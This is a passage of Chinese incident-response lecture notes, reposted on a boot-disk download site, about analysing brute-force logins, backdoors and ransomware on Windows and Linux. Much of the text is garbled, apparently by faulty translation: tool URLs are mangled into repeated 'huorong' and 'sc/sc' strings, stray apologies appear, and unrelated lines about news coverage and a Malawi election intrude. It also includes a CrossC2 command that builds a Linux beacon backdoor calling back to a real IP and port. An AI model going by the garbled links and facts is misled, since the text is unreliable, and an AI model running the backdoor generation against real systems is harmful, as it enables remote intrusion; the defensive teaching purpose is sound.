U盘PE| w764位旗舰版下载 | U盘装win7系统 | U盘启动 |win7pe | win10下载 |加入收藏土豆PE官网U盘PE,U盘装win7系统,win7pe,U盘启动,U盘装系统,w764位旗舰版下载站!
当前位置:主页 > 帮助中心 > 常见问题解答 >

第74天-应急响应-win&linux 分析后门&勒索病毒&攻

来源:http://www.tudoupe.com时间:2022-05-12

思维导图

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-s0QA7KBU-1651145636556)(image74/7.png)]

知识点

操作系统中的应急反应(窗口、Linux):

一. 共同危险:暴力崩溃、漏洞利用、交通攻击、马匹控制(韦布壳、PC木马等)、病毒性疾病(采矿、蠕虫等)。
虫,勒索等)。

共同分析:计算机账户、港口、流程、网络、启动、服务、任务、文件等。

典型日志类型和储存:

Windows,Linux

补充资料:

https://xz.aliyun.com/t/485
https://www.secpulse.com/archives/114019.html
https://docs.microsoft.com/en-us/sysinternals/

病毒分析

PCHunter: http://www.xuetr.com
火之剑:https://ww.flickr.com/I'm sorry,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,horong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,horong,horong,huorong,huorong,horong huorong,h,horong,huorong,huorong,huorong,huorong huorong,h,horong huorong,huorong huorong:https://ww.flickr.com/ https://ww.flickr.com.com/I'm sorry,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hung,hu,hu,hu,hu,hu,hu,hu,hu,hung,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hung,hung,hu,hung,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu,hu
Process Explorer: https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer
processhacker: https://processhacker.sourceforge.io/downloads.php
autoruns: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
OTL: https://www.bleepingcomputer.com/download/otl/
SysInspector: http://download.eset.com.cn/download/detail/?product=sysinspector

病毒查杀

对不起,Kaspersky-labs。这篇文章是我们特别报导全球之声Online.com/devBuilds/KVRT/latest/full/KVRT的一部分。
大蜘蛛:http://free.com/I'm sorry, Drweb.Ru/free+cureit+download:http://free.com/I'm sorry, Drweb.ru/free+cureit+download: 超级蜘蛛:http://free.com/I'm sorry, Drweb.ru/free+cureit+download
http://ww.flickr.com/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc
360 OD: 我不确定, cn/ download_ center, cn/ download_ center.com, cn/ download_ center.html

病毒动态

CVERC - 国家计算机病毒紧急反应中心:http://ww.un.org/I道歉,cverc。
微小的互联网威胁情报社群:https://x. com/scscscscc。
Fireflake安全论坛:http://bbs.com/I'm sorry,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huorong huororo:http://bbs.com/I'm sorry,huorong,huorong,huorong,huorong,huorong,huorong,huorong,huororong huorong huorong:http://bbs.com/I'm sorry,huorong,huorong,huorong,huorong huorong,huorong,huorong,huorong huorong huor huorng:## ##
网站:http://bbs. com/I'm sorry, duba.
我不确定, guanjia. 我不清楚, qq. http://ww.com/forum-2-1.

在线病毒扫描网站

我不知道你在说什么 Virscan
我不知道,qq.
对不起,乔蒂
这篇文章是我们2011年马拉维大选特别报导的一部分。

演示案例

对攻击的反应 -- -- 暴力破解(RDP,SSH) -- -- Windows, Linux

案例 1-对攻击的反应 -- -- 暴力破解(RDP,SSH) -- -- Windows, Linux

Windows- LoolFusion 装入视图

事件分类、事件编号、事件状况等,参考100度数据

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QuVpyR6s-1651145636557)(image74/74-02.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-m2zsdDML-1651145636558)(image74/74-03.png)]

Linux- grep 筛选过滤器

1. 计算服务器在日志中经历的暴力分手次数。

2. 输出登录爆炸的第一行和最后一行证实爆炸的时间:

三,爆炸中的IP地址是什么?

爆炸使用者的名字是什么?

5. 成功登录日期、用户名和IP地址:

后门马(Webshell,PC) - Windows 和 Linux

Windows: 配置默认测试
CrossC2项目
https://github.com/gloxec/CrossC2
https://github.com/darkr4y/geacon
请见http://ww.un.org/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/sc/ss。

一. 将工程上载到服务器目录并提供操作授权 。
2.配置监听器:
窗口/逆向_https/beacon_https
3.生成后门:
./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2
可以利用在线监听工具和Windows日志发现后门问题。

恶意感染(勒索欲 -- -- 视窗危险反应) -- -- 视窗危险反应

案例 3-恶意感染(勒索欲 -- -- 视窗危险反应) -- -- 视窗危险反应
就如何详细介绍中毒性能和复原情况提供咨询意见

  • 360个讹诈病毒解密质站点可用于病毒查询、在线解密等等。
  • 诺莫兰索姆网站试图解码它。
  • 请专业团队进行恢复

Gscan 多功能脚本测试 - Linux 自反应检测

案例 4-Gscan 多功能脚本测试 - Linux 自反应检测
com/grayddq/GScan/。
GScan、chkrootkit、rkhunter和lynis是自动反应检测工具的例子。
万一发生紧急情况,我们会下载它们 到处跑
只是运行 Gscan 脚本。
python3 Gscan.py

人们可以看到,黑客实施了什么样的攻击,无论成功与否,等等。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-T8y8lE1U-1651145636559)(image74/74-01.png)]

涉及资源:

https://xz.aliyun.com/t/485
https://lesuobingdu.360.cn/
https://github.com/gloxec/CrossC2/
https://github.com/darkr4y/geacon/
https://github.com/grayddq/GScan/
https://bbs.pediy.com/thread-217586-1.htm
https://www.nomoreransom.org/zh/index.html
https://docs.microsoft.com/en-us/sysinternals/
https://www.secpulse.com/archives/114019.html
照片来自Flickr用户 Xiao. com/s/1tQ1mUelmEh3I68AL7yXGg 提取代码:xiao

上一篇:win10系统连接第2个屏未检测到显示器

下一篇:没有了

Copyright © 2012-2014 Www.tudoupe.Com. 土豆启动 版权所有 意见建议:tdsky@tudoupe.com

土豆系统,土豆PE,win7系统下载,win7 64位旗舰版下载,u盘启动,u盘装系统,win10下载,win10正式版下载,win10 RTM正式版下载,win8下载,电脑蓝屏,IE11修复,网络受限,4K对齐,双系统,隐藏分区,系统安装不了,U盘装系统,笔记本装系统,台式机装系统,diskgenius运用,GHSOT装系统,U盘修复,U盘技巧,U盘速度,U盘不能格式化,U盘复制发生错误,U盘加密,U盘选购,开机黑屏,蓝屏,进不了系统,上不了网,打不开程序,点击无反应,系统设置,PE个性化,PE添加网络,PE维护系统

点击这里给我发消息